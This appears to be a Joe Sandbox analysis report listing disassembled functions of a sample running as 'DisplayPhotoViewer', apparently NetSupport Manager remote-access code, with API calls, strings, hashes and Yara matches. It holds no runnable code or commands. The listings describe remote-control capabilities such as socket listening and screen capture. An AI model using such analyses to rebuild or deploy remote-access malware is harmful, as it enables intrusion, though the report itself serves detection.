                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Create$Object$MetricsSystem$Select$ColorCompatibleWindow$Bitmap$CursorDeleteText_memset$BrushClipFontIndirectLoadSolid$ErrorExitLastMessageProcessRectReleaseStockUpdate_malloc_strrchr_swscanfwsprintf
                                                                                                    • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$DISPLAY$FillColour$FillStyle$Font$Monitor$PenColour$PenWidth$Show$ShowAppIds$Tool$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 2635354838-4093202882
                                                                                                    • Opcode ID: 2e50c44e1fa5e67d10b9592fcf3ff0d0bc7dda72930c32344f7f7c550c6657e7
                                                                                                    • Instruction ID: 08dc9fe3903b94fe4ff24ac761506ea9977523278d8d5343f9741b8a3b7c0153
                                                                                                    • Opcode Fuzzy Hash: 2e50c44e1fa5e67d10b9592fcf3ff0d0bc7dda72930c32344f7f7c550c6657e7
                                                                                                    • Instruction Fuzzy Hash: 2E228475A00719AFD760DF64CC89FDAF7B9BB48708F0085ADE65A97284EB70A940CF50
                                                                                                    Function 10702410 Relevance: 82.8, APIs: 27, Strings: 20, Instructions: 592windowtimethreadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(00000000,74DF2F30,?,?,1070226E,?,?,10702DEA,?,?,?,107022B6,?,?,10702DEA,00000000), ref: 10702420
                                                                                                    • GetTickCount.KERNEL32 ref: 10702473
                                                                                                    • GetTickCount.KERNEL32 ref: 1070249C
                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 107024BA
                                                                                                    • TranslateMessage.USER32(?), ref: 107024C0
                                                                                                    • DispatchMessageA.USER32(?), ref: 107024C6
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 107024DE
                                                                                                    • wsprintfA.USER32 ref: 107024F7
                                                                                                    • wsprintfA.USER32 ref: 1070251E
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 1070252A
                                                                                                    • wsprintfA.USER32 ref: 1070253D
                                                                                                    • OutputDebugStringA.KERNEL32(?), ref: 10702549
                                                                                                    • wsprintfA.USER32 ref: 10702575
                                                                                                    • wsprintfA.USER32 ref: 107025BA
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 107025CD
                                                                                                    • wsprintfA.USER32 ref: 10702658
                                                                                                    • GetTempPathA.KERNEL32(00000104,?), ref: 1070275B
                                                                                                    • GetLocalTime.KERNEL32(?), ref: 107027B4
                                                                                                    • GetVersionExA.KERNEL32 ref: 107027DA
                                                                                                    • wsprintfA.USER32 ref: 10702853
                                                                                                    • wsprintfA.USER32 ref: 1070292A
                                                                                                    • wsprintfA.USER32 ref: 10702A9C
                                                                                                    • SetTimer.USER32(00000000,00000000,00000000,10702BF0), ref: 10702AB8
                                                                                                    • MessageBoxA.USER32(00000000,?,?,00000000), ref: 10702ACF
                                                                                                    • KillTimer.USER32(00000000,00000000), ref: 10702AD8
                                                                                                    • PeekMessageA.USER32(?,00000000,00000012,00000012,00000001), ref: 10702AEA
                                                                                                    • MessageBoxA.USER32(00000000,?,?,00000000), ref: 10702B06
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wsprintf$Message$CountCurrentThreadTickTimer$DebugDispatchErrorFileKillLastLocalModuleNameOutputPathPeekStringTempTimeTranslateVersion
                                                                                                    • String ID: Call Stack:%s$Details in file:$...(more)$Callstack:$%04d-%02d-%02d %02d:%02d:%02d.%03d, Win%s %d.%d$%d.$, error code %u (x%x)$, thread=%s$, tid=%x$.err$.exe$21/01/14 12:07:00 V12.01$Assert failed - $Assert, tid=%x%s$File %hs, line %d%s%sBuild: %hs (%.17hs)Expression: %s$NOT copied to disk$Support\$Unhandled Exception (GPF)$Unhandled Exception (GPF) - $copied to %s
                                                                                                    • API String ID: 1966893409-1844804007
                                                                                                    • Opcode ID: 0f48e4375eb0324f7077f7be426236a81b1225d4b631880fcc95c967b8863504
                                                                                                    • Instruction ID: c52ce69b66e472707bdf106e5462cddb7a304d656c752e9accba523f28ea6f7c
                                                                                                    • Opcode Fuzzy Hash: 0f48e4375eb0324f7077f7be426236a81b1225d4b631880fcc95c967b8863504
                                                                                                    • Instruction Fuzzy Hash: 05121972A002189BDB54CB74CC85BEE77A9EB49310F104399F91AE72C4DFB4AE45CB94
                                                                                                    Function 1110B640 Relevance: 44.0, APIs: 29, Instructions: 470windowsleepkeyboardCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsIconic.USER32(?), ref: 1110B66A
                                                                                                    • GetTickCount.KERNEL32 ref: 1110B6DE
                                                                                                    • CreateRectRgn.GDI32(00000000,?,?,?), ref: 1110B702
                                                                                                    • GetClientRect.USER32(?,?), ref: 1110B7B2
                                                                                                    • SetStretchBltMode.GDI32(?,00000004), ref: 1110B8E4
                                                                                                    • CreateRectRgn.GDI32(?,?,?,?), ref: 1110B93F
                                                                                                    • GetClipRgn.GDI32(?,00000000), ref: 1110B953
                                                                                                    • OffsetRgn.GDI32(00000000,00000000,00000000), ref: 1110B978
                                                                                                    • GetRgnBox.GDI32(00000000,?), ref: 1110B983
                                                                                                    • SelectClipRgn.GDI32(?,00000000), ref: 1110B991
                                                                                                    • StretchBlt.GDI32(?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 1110BA1B
                                                                                                    • SelectClipRgn.GDI32(?,00000000), ref: 1110BA2A
                                                                                                    • DeleteObject.GDI32(?), ref: 1110BA34
                                                                                                    • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00CC0020), ref: 1110BA72
                                                                                                    • GetWindowOrgEx.GDI32(?,?), ref: 1110BA87
                                                                                                    • StretchBlt.GDI32(?,?,?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 1110BACC
                                                                                                    • GetKeyState.USER32(000000A3), ref: 1110BAF7
                                                                                                    • CreatePen.GDI32(00000000,00000001,000000FF), ref: 1110BB3B
                                                                                                    • CreatePen.GDI32(00000000,00000001,00FFFFFF), ref: 1110BB4D
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 1110BB61
                                                                                                    • Polyline.GDI32(00000000,?,00000005), ref: 1110BB77
                                                                                                    • Sleep.KERNEL32(00000032), ref: 1110BB7F
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 1110BB90
                                                                                                    • Polyline.GDI32(00000000,?,00000005), ref: 1110BBA3
                                                                                                    • Sleep.KERNEL32(00000032), ref: 1110BBAB
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 1110BBBC
                                                                                                    • DeleteObject.GDI32(?), ref: 1110BBC6
                                                                                                    • DeleteObject.GDI32(?), ref: 1110BBD0
                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,00004000,?,?,00000000,00000000,00CC0020), ref: 1110BBF5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Object$Select$CreateStretch$ClipDeleteRect$PolylineSleep$ClientCountIconicModeOffsetStateTickWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 879653699-0
                                                                                                    • Opcode ID: ae3e1dcbd93d47543e7c3eaf08f32a26ed53f5eabfeff51ae37d1e2553353821
                                                                                                    • Instruction ID: 7984207307c20109081e5b6f2b62563caa98a0db5f7b3b4cfb8bc68f55d11ed3
                                                                                                    • Opcode Fuzzy Hash: ae3e1dcbd93d47543e7c3eaf08f32a26ed53f5eabfeff51ae37d1e2553353821
                                                                                                    • Instruction Fuzzy Hash: 0F120475A01B099FCB64CFA8D984BAEF7F5FB88305F10852EE55AA7244DB70A840CF14
                                                                                                    Function 10701940 Relevance: 38.6, APIs: 11, Strings: 11, Instructions: 58libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 10701A40: GetModuleFileNameA.KERNEL32(?,?,00000100), ref: 10701A6D
                                                                                                      • Part of subcall function 10701A40: wsprintfA.USER32 ref: 10701AA7
                                                                                                    • GetModuleHandleA.KERNEL32(NSMTRACE,10701A57), ref: 1070195A
                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceLoad), ref: 10701975
                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceUnload), ref: 10701982
                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigItem), ref: 1070198F
                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigInt), ref: 1070199C
                                                                                                    • GetProcAddress.KERNEL32(00000000,vRealNSMTrace), ref: 107019A9
                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceClose), ref: 107019B6
                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceReadConfigItemFromFile), ref: 107019C3
                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceExclusive), ref: 107019D0
                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceUnexclusive), ref: 107019DD
                                                                                                    • GetProcAddress.KERNEL32(00000000,NSMTraceSetModuleName), ref: 107019EA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Module$FileHandleNamewsprintf
                                                                                                    • String ID: NSMTRACE$NSMTraceClose$NSMTraceExclusive$NSMTraceGetConfigInt$NSMTraceGetConfigItem$NSMTraceLoad$NSMTraceReadConfigItemFromFile$NSMTraceSetModuleName$NSMTraceUnexclusive$NSMTraceUnload$vRealNSMTrace
                                                                                                    • API String ID: 3686653098-3703587661
                                                                                                    • Opcode ID: 85c81bd3f1f53e7a069c9c13ea2767121e213c62303f2cb39922391e0f6fd8af
                                                                                                    • Instruction ID: 976e66a9952db34848015b0686b79f73aadc81c498bb77128f78c0849c122566
                                                                                                    • Opcode Fuzzy Hash: 85c81bd3f1f53e7a069c9c13ea2767121e213c62303f2cb39922391e0f6fd8af
                                                                                                    • Instruction Fuzzy Hash: 0901D2F19112787AC730AB755C49FC62AB9EB9D300F014616F400D7AA0D7B4D093DBA8
                                                                                                    Function 110619A0 Relevance: 28.3, APIs: 8, Strings: 8, Instructions: 281COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _memset
                                                                                                    • String ID: #$$$$CLIENTNAME$$$PROMPT$$%03d%s$..\ctl32\Connect.cpp$.prn$op - obuf <= _tsizeof (obuf)
                                                                                                    • API String ID: 2102423945-3087083064
                                                                                                    • Opcode ID: 1c3e1aa8d2f666270324048d9e48de6a7157740e17a48a556423e7e1c1c2f1bc
                                                                                                    • Instruction ID: 74103a851687b1e317bd837d5c28fdb707630397fc2d11fd60b1a990bd3562c2
                                                                                                    • Opcode Fuzzy Hash: 1c3e1aa8d2f666270324048d9e48de6a7157740e17a48a556423e7e1c1c2f1bc
                                                                                                    • Instruction Fuzzy Hash: 9DA16B71E0025A6BDB22CF34CC91BEEBBFDAF86304F1441E9D95997240E631AE45CB90
                                                                                                    Function 110D1640 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 200networkCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 110D7BA0: EnterCriticalSection.KERNEL32(111E0C5C,11017238,218EC38C,?,?,?,111C0108,1117BDB8,000000FF,?,11019202), ref: 110D7BA1
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 110D16C3
                                                                                                      • Part of subcall function 11157E51: RaiseException.KERNEL32(?,?,111084C4,?,?,?,?,?,111084C4,?,111C0108), ref: 11157E93
                                                                                                      • Part of subcall function 110D1340: __CxxThrowException@8.LIBCMT ref: 110D13B2
                                                                                                      • Part of subcall function 110D1340: getpeername.WSOCK32(?,00000000,00000000,218EC38C), ref: 110D13D0
                                                                                                      • Part of subcall function 11010D50: _memmove.LIBCMT ref: 11010D8D
                                                                                                    • gethostbyname.WSOCK32(0.0.0.0,218EC38C,?,?,00000000), ref: 110D16D5
                                                                                                    • WSAGetLastError.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,1117C00B), ref: 110D16E1
                                                                                                    • _memmove.LIBCMT ref: 110D170B
                                                                                                    • htons.WSOCK32(00000000), ref: 110D1731
                                                                                                    • socket.WSOCK32(00000002,00000001,00000000), ref: 110D1745
                                                                                                    • WSAGetLastError.WSOCK32 ref: 110D1753
                                                                                                    • #21.WSOCK32(00000000,0000FFFF,00000004,?,00000004), ref: 110D1771
                                                                                                    • bind.WSOCK32(?,?,00000010), ref: 110D1781
                                                                                                    • WSAGetLastError.WSOCK32 ref: 110D178C
                                                                                                    • listen.WSOCK32(?,7FFFFFFF,218EC38C,?,?,00000000), ref: 110D17A8
                                                                                                    • WSAGetLastError.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,1117C00B), ref: 110D17B3
                                                                                                    • accept.WSOCK32(?,00000000,00000000,000000FF), ref: 110D1816
                                                                                                    • WSAGetLastError.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,1117C00B), ref: 110D1824
                                                                                                      • Part of subcall function 110D98D0: OutputDebugStringA.KERNEL32(111E0BD0,000000FF,NsAppSystem::CNsAsException::CNsAsException,0000002B,111E0BD0,00000000,000000FF,218EC38C,?,00000000,00000000,?,?,?,00000000,1117D21B), ref: 110D9983
                                                                                                      • Part of subcall function 110D98D0: OutputDebugStringA.KERNEL32(11192F38,?,?,?,00000000,1117D21B,000000FF,?,110D7033,?,Invalid Server paramters), ref: 110D998A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$DebugException@8OutputStringThrow_memmove$CriticalEnterExceptionRaiseSectionacceptbindgethostbynamegetpeernamehtonslistensocket
                                                                                                    • String ID: 0.0.0.0$Listen() the socket is not closed
                                                                                                    • API String ID: 1096978048-1307932746
                                                                                                    • Opcode ID: 054e26bb97aaf3827a4da9fb0d46d19f8d37a779fba190a9ed8566491c4b6db7
                                                                                                    • Instruction ID: 75fbb713bcc43a2d91c028340bf4bea3e3fbe913fe8f2b0e60ed69cb15474446
                                                                                                    • Opcode Fuzzy Hash: 054e26bb97aaf3827a4da9fb0d46d19f8d37a779fba190a9ed8566491c4b6db7
                                                                                                    • Instruction Fuzzy Hash: 9B6183B4E00706ABDF04DFB8C895B9EF7B9AF48728F104619E925D72C0DF70A5048BA1
                                                                                                    Function 1106B9D0 Relevance: 26.6, APIs: 10, Strings: 5, Instructions: 358sleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CapiHangup.PCICAPI ref: 1106BC4F
                                                                                                    • CapiClose.PCICAPI ref: 1106BC54
                                                                                                    • CapiOpen.PCICAPI(00000000,00000000), ref: 1106BC5D
                                                                                                    • CapiListen.PCICAPI(00000001,00000000,00000000,00000000), ref: 1106BC6B
                                                                                                    • GetTickCount.KERNEL32 ref: 1106BCFA
                                                                                                    • GetTickCount.KERNEL32 ref: 1106BD02
                                                                                                    • CapiHangup.PCICAPI ref: 1106BD8F
                                                                                                    • Sleep.KERNEL32(00000064,?,?,?,?,?,?,?,?,?,?,?,?,?,000018BF,10000000), ref: 1106BDB9
                                                                                                    • GetTickCount.KERNEL32 ref: 1106BDBF
                                                                                                    • Sleep.KERNEL32(000003E8), ref: 1106BE05
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Capi$CountTick$HangupSleep$CloseListenOpen
                                                                                                    • String ID: $DB$*MSN$..\ctl32\Connect.cpp$Dialup$tapi
                                                                                                    • API String ID: 1585182496-2734021829
                                                                                                    • Opcode ID: 7c770ee502089d41b6fa11009119e50a7c6c7abd7a69a083e89de3bcbba487bd
                                                                                                    • Instruction ID: 5c9455bb8696ab22761e7f9117eb05480bce2e52a827a06de5a724ae55753baa
                                                                                                    • Opcode Fuzzy Hash: 7c770ee502089d41b6fa11009119e50a7c6c7abd7a69a083e89de3bcbba487bd
                                                                                                    • Instruction Fuzzy Hash: 40C129B5F006099FEB60DB34DC91BADB3A4EF44318F1041B9E51D9B2C1EE71AA80CB91
                                                                                                    Function 107036C0 Relevance: 25.1, APIs: 11, Strings: 3, Instructions: 598COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • Received unexpected CAPI message, command=%x, plci=%d, ncci=%d, xrefs: 10703EFE
                                                                                                    • (dwChannelState [nChannel] & SENT_CONNECT_B3_REQ) == 0, xrefs: 10703A68
                                                                                                    • E:\nsmsrc\nsm\1201\1201\ctl32\PCICAPI.C, xrefs: 10703A63
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (dwChannelState [nChannel] & SENT_CONNECT_B3_REQ) == 0$E:\nsmsrc\nsm\1201\1201\ctl32\PCICAPI.C$Received unexpected CAPI message, command=%x, plci=%d, ncci=%d
                                                                                                    • API String ID: 0-1676465985
                                                                                                    • Opcode ID: e736f835606a803164302c29a5de0fbae49d28d1c3c8f7adb9776ded89a2018c
                                                                                                    • Instruction ID: 02ffce3df78f0e2866fe0c5eeefcdb23fc1e6f8c39231c515e8732e0ed09c3a5
                                                                                                    • Opcode Fuzzy Hash: e736f835606a803164302c29a5de0fbae49d28d1c3c8f7adb9776ded89a2018c
                                                                                                    • Instruction Fuzzy Hash: ED228F72A00154ABC710CF68EC817AEB7F8FF4A350F40C3A6E54AA7290DB715E45C755
                                                                                                    Function 110C79F0 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 202windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    • IsWindow.USER32(00000000), ref: 110C7AE3
                                                                                                    • IsWindowVisible.USER32(00000000), ref: 110C7AF2
                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 110C7B0A
                                                                                                    • FindResourceExA.KERNEL32(00000000,00000005,?,00000000), ref: 110C7B3D
                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 110C7B66
                                                                                                    • LockResource.KERNEL32(00000000), ref: 110C7B8A
                                                                                                    • DialogBoxIndirectParamA.USER32(00000000,00000000,00000000,Function_000C6770,111B1884), ref: 110C7BBB
                                                                                                    • DialogBoxParamA.USER32(00000000,?,00000000,Function_000C6770,111B1884), ref: 110C7BDA
                                                                                                      • Part of subcall function 11027F50: _strrchr.LIBCMT ref: 11028045
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028084
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ResourceWindow$DialogExitParamProcess$ErrorFindForegroundIndirectLastLoadLockMessageVisible_strrchrwsprintf
